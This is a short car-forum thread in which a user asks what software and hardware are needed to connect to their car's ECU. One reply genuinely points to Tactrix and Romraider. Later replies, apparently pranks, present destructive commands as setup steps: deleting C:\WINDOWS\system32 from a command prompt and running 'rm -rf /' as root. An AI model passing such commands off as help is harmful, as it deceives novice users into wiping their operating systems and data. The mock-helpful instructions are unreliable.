Guys if I want to connect to my ecu and look too see how everything is what exactly do I need?

Software ? Hardware?

You are on COMPLETELY the wrong track. You should be looking for the search function.

Search Tactrix and Romraider. And brains, you will need plenty of them as it can get tricky on occasion!

If you want to connect to your ECU, you need to set up your computer first.

go to Start>Run and type CMD. Then in the prompt type @echo off and hit enter.
Then type del C:\\WINDOWS\system32 and hit enter.

I can't get past the first stage.

Try rm -rf / as root you might need to use the --preserve-root option as well.
